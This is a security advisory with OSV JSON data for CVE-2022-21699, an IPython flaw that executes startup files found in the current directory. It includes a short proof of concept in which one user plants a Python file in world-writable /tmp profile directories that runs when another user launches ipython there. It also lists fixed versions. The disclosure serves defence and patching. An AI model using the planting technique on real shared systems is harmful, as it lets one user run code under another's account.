ghsa-pq7m-3gw7-gq5x
Vulnerability from github
We’d like to disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in CWD. This vulnerability allows one user to run code as another.
Proof of concept
User1:
mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/foo.py
User2:
cd /tmp
ipython
User2 will see:
Python 3.9.7 (default, Oct 25 2021, 01:04:21)
Type 'copyright', 'credits' or 'license' for more information
IPython 7.29.0 -- An enhanced Interactive Python. Type '?' for help.
stealing your private secrets
Patched release and documentation
See https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699,
Version 8.0.1, 7.31.1 for current Python version are recommended. Version 7.16.3 has also been published for Python 3.6 users, Version 5.11 (source only, 5.x branch on github) for older Python versions.
{ "affected": [ { "package": { "ecosystem": "PyPI", "name": "ipython" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "5.11" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "PyPI", "name": "ipython" }, "ranges": [ { "events": [ { "introduced": "6.0.0" }, { "fixed": "7.16.3" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "PyPI", "name": "ipython" }, "ranges": [ { "events": [ { "introduced": "7.17.0" }, { "fixed": "7.31.1" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "PyPI", "name": "ipython" }, "ranges": [ { "events": [ { "introduced": "8.0.0" }, { "fixed": "8.0.1" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2022-21699" ], "database_specific": { "cwe_ids": [ "CWE-250", "CWE-269", "CWE-279" ], "github_reviewed": true, "github_reviewed_at": "2022-01-19T21:26:17Z", "nvd_published_at": "2022-01-19T22:15:00Z", "severity": "HIGH" }, "details": "We\u2019d like to disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in CWD. This vulnerability allows one user to run code as another.\n \nProof of concept\n\nUser1:\n```\nmkdir -m 777 /tmp/profile_default\nmkdir -m 777 /tmp/profile_default/startup\necho \u0027print(\"stealing your private secrets\")\u0027 \u003e /tmp/profile_default/startup/foo.py\n```\n\nUser2:\n```\ncd /tmp\nipython\n```\n\n \n\nUser2 will see:\n```\nPython 3.9.7 (default, Oct 25 2021, 01:04:21)\nType \u0027copyright\u0027, \u0027credits\u0027 or \u0027license\u0027 for more information\nIPython 7.29.0 -- An enhanced Interactive Python. Type \u0027?\u0027 for help.\nstealing your private secrets\n```\n\n\n## Patched release and documentation\n\nSee https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699, \n\nVersion 8.0.1, 7.31.1 for current Python version are recommended. \nVersion 7.16.3 has also been published for Python 3.6 users, \nVersion 5.11 (source only, 5.x branch on github) for older Python versions.", "id": "GHSA-pq7m-3gw7-gq5x", "modified": "2024-09-27T17:22:07Z", "published": "2022-01-21T18:55:30Z", "references": [ { "type": "WEB", "url": "https://github.com/ipython/ipython/security/advisories/GHSA-pq7m-3gw7-gq5x" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21699" }, { "type": "WEB", "url": "https://github.com/ipython/ipython/commit/46a51ed69cdf41b4333943d9ceeb945c4ede5668" }, { "type": "WEB", "url": "https://github.com/ipython/ipython/commit/5fa1e409d2dc126c456510c16ece18e08b524e5b" }, { "type": "WEB", "url": "https://github.com/ipython/ipython/commit/67ca2b3aa9039438e6f80e3fccca556f26100b4d" }, { "type": "WEB", "url": "https://github.com/ipython/ipython/commit/a06ca837273271b4acb82c29be97c0b6d12a30ea" }, { "type": "PACKAGE", "url": "https://github.com/ipython/ipython" }, { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/ipython/PYSEC-2022-12.yaml" }, { "type": "WEB", "url": "https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/01/msg00021.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CRQRTWHYXMLDJ572VGVUZMUPEOTPM3KB" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DZ7LVZBB4D7KVSFNEQUBEHFO3JW6D2ZK" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "type": "CVSS_V3" }, { "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P", "type": "CVSS_V4" } ], "summary": "Execution with Unnecessary Privileges in ipython" }
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.